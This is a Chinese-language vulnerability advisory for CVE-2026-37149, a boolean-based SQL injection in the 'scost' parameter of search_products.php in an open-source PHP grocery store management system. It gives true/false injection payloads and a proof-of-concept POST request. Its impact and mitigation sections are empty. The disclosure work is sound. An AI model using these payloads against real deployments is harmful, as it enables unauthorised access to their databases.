CVE-2026-37149 SQL注入漏洞在 GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 中
概述
描述
GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 包含一个 SQL 注入漏洞,位于 "/grocery/search_products.php" 的 "scost" 参数中。
应用程序在将用户输入嵌入 SQL 查询之前未能正确验证这些输入。攻击者可以通过易受攻击的参数注入精心构造的 SQL 表达式,并操纵后端数据库查询。
成功利用此漏洞可能导致未经授权访问敏感数据库信息以及执行任意 SQL 语句。
受影响产品
受影响组件
攻击类型 远程
供应商信息 开源项目由仓库所有者维护: https://github.com/anirudhkannanvp
技术细节
该漏洞通过基于布尔的SQL注入技术确认。
True条件载荷
-1 OR 321=6 AND 000483=000483 --
False条件载荷
-1 OR 320=6 AND 000483=000483 --
应用程序的响应根据注入条件的真假而变化,从而确认了SQL注入的存在。
进一步的测试确认了以下SQL函数能够成功执行:
SELECT database()
返回的数据库名称为:
grocery
这表明可以通过该易受攻击的参数执行任意SQL查询。
概念验证
请求
POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded
scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products
结果
响应根据注入的布尔条件而变化,确认 "scost" 参数存在SQL注入漏洞。
影响
潜在影响包括:
缓解措施
开发者应:
参考
致谢 由 Dhyey Patel 发现并报告。